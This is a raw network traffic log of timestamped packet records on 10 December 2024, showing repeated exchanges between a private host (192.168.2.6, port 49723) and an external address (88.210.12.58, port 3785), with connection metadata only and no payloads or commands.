Dec 10, 2024 08:59:38.767438889 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:38.849045992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:38.868547916 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:38.952769995 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:38.968419075 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.051525116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.072150946 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.156747103 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.170941114 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.252044916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.276273012 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.356753111 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.371722937 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.453039885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.476377964 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.556751966 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.574228048 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.656749964 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.676249981 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.756019115 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.776110888 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.860755920 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.875358105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:39.957027912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:39.980053902 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:40.057055950 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:40.076395035 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:40.158127069 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:40.176440954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:40.259063005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:40.277561903 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:40.360091925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:40.378503084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:40.478929996 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:40.479617119 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:40.599220037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:41.095475912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.196023941 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.214786053 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:41.297013044 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.315577030 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:41.398022890 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.416368008 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:41.498042107 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.517729044 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:41.599633932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.617362976 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:41.700079918 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.719257116 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:41.803348064 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.819462061 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:41.904748917 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:41.923001051 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.003047943 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.024116039 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.104055882 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.122324944 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.205056906 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.223380089 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.306039095 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.324407101 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.407012939 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.425578117 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.507070065 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.526614904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.608133078 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.626498938 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.709038973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.727680922 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.809065104 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.828783035 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:42.909096003 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:42.928575993 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.009243965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.028769016 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.109064102 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.128686905 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.210016012 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.228619099 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.311008930 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.329288006 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.411004066 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.430322886 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.512121916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.530386925 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.612071991 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.631552935 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.712999105 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.731422901 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.813047886 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.832518101 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:43.914813042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:43.932379007 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.015032053 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.034041882 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.116051912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.134393930 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.216114998 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.235358000 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.316056967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.335412979 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.417026043 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.435442924 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.517072916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.536427021 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.618020058 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.638514996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.718130112 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.737327099 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.819027901 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.837548971 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:44.919038057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:44.938399076 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.020039082 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.038418055 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.121032000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.139585018 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.222665071 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.240570068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.322024107 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.342005014 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.429842949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.441371918 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.532759905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.549232960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.639414072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.652162075 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.758841038 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:45.844619989 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.946773052 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:45.963984013 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.045042992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.066154957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.146044016 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.164498091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.246037960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.265655994 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.347074986 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.365389109 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.448033094 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.466464996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.548111916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.642546892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.649100065 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.668050051 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.750106096 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.768383980 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.851131916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.870364904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:46.952047110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:46.970618010 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.052026987 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.071495056 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.154771090 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.171483040 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.252034903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.274188042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.353033066 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.371392965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.454824924 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.472444057 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.554043055 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.574188948 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.654922009 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.673408985 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.758768082 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.774249077 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.856026888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.878309965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:47.957047939 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:47.975588083 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:48.058142900 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:48.076431990 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:48.177537918 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:48.224628925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:48.327064991 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:48.344099998 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:48.446551085 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:48.538028955 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:48.657398939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:48.740164995 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:48.841099977 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:48.860183001 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:48.941143036 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:48.960870981 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.043150902 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.060825109 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.146814108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.162848949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.243262053 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.266210079 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.346843958 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.362772942 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.444037914 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.466262102 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.544207096 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.563441992 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.646821022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.663604975 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.746889114 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.766202927 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.848771095 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.866338968 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:49.947042942 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:49.968132019 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.047069073 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.066390991 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.148097992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.167406082 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.248089075 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.267621994 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.349133968 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.367522955 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.450063944 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.468499899 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.550059080 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.569449902 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.651046991 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.670078039 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.751092911 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.770469904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.852133036 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:50.870517015 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.971586943 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:50.977433920 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:51.080826998 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:51.097091913 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:51.180782080 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:51.200263023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:51.300523996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:51.395726919 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:51.515273094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:51.595058918 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:51.696778059 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:51.714576960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:51.797173023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:51.816237926 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:51.898044109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:51.916606903 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:51.999059916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.017409086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.100052118 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.119014025 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.201215029 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.219507933 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.302074909 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.320736885 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.402076960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.421566963 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.503029108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.521532059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.603070021 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.622484922 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.704068899 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.722599983 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.804091930 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.823731899 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:52.905061960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:52.923588037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.008784056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.024662018 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.108793020 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.128436089 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.208777905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.228689909 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.308769941 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.328402996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.408768892 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.428299904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.506105900 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.528388023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.608414888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.625653028 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.709336996 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.727885962 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.821523905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.828886032 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:53.928781986 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:53.941005945 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:54.048240900 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:54.345132113 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:54.445115089 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:54.465379953 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:54.545145988 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:54.564565897 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:54.645070076 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:54.664557934 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:54.746048927 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:54.764497995 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:54.846039057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:54.865504980 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:54.947035074 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:54.965470076 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.048038960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.066550016 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.148780107 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.167656898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.248775005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.268331051 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.349025011 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.368232965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.449107885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.468676090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.550024986 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.568655014 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.652045965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.669569969 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.752782106 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.771440983 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.852777004 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.872226000 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:55.956787109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:55.972207069 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.054080009 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.076489925 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.155071974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.173619032 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.255155087 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.274641991 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.358746052 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.374533892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.460112095 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.478233099 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.561065912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.579490900 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.661053896 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.680505991 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.762156010 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.780425072 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.862099886 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.881587982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:56.962091923 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:56.981626987 CET	3785	49723	88.210.12.58	192.168.2.6
